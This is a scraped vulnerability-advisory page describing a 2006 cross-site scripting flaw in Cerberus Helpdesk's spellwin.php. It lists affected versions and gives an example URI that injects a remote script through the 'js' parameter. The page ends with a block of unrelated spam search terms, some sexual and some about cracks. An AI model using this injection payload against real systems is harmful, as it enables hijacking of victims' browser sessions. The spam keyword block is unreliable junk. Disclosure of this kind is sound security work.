exploits , vulnerabilities , articles , Cerberus Helpdesk Spellwin.PHP Cross-Site Scripting Vulnerability

Title	Cerberus Helpdesk Spellwin.PHP Cross-Site Scripting Vulnerability
Published	2006-12-04-12:00AM
Updated	2006-12-04-09:54PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	En Douli is credited with the discovery of this vulnerability.
Vulnerable	Cerberus Helpdesk 3.3 Cerberus Helpdesk 3.2.1 Cerberus Helpdesk 2.7.1 Development Release Cerberus Helpdesk 2.7 Cerberus Helpdesk 2.6.1 Cerberus Helpdesk 2.5 Cerberus Helpdesk 2.4 Cerberus Helpdesk 2.3 Cerberus Helpdesk 2.2 Cerberus Helpdesk 2.1 Cerberus Helpdesk 2.0 Cerberus Helpdesk 0.97.3 Cerberus Helpdesk 3.2.Build 317
Not Vulnerable
Code	Attackers can exploit this issue by enticing an unsuspected victim into following a malicious URI. An example URI has been provided: http://www.example.com/includes/elements/spellcheck/spellwin.php?pspell_loaded=1&js=<http://www.example2.com/cerberus/includes/elements/spellchec k/spellwin.php?pspell_loaded=1&js=><script src=JS_FILE></script>
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability
2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 05:00:53 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mambo Remo tamilsexac www.starba book.159.c www sexy m www.it197. Gambar lob Free india kamapisach mambo Remo www sexy m www.powucx lady1234.c www.sss001 www.powucx free-teenp ip board 2 Sex lanka. PHP-Nuke+8 result of ww.cctv61. canl&a prabhas ph bigtitssex www.fuda19 maxcpm.inf bbs.e860.c taobaowang LIVE Foto cewe www.tcjob. fuck girl v2.3 vbgal guildftpd priyamanis FREE SEX V www.766wz. Short clip global ann ddwenzhang Sex video VIDEO POR kazaa nickylee.5 Crack+Data www.fsehom 2...2Fbrim __3cb__Gue www.839.cq 0551dy.com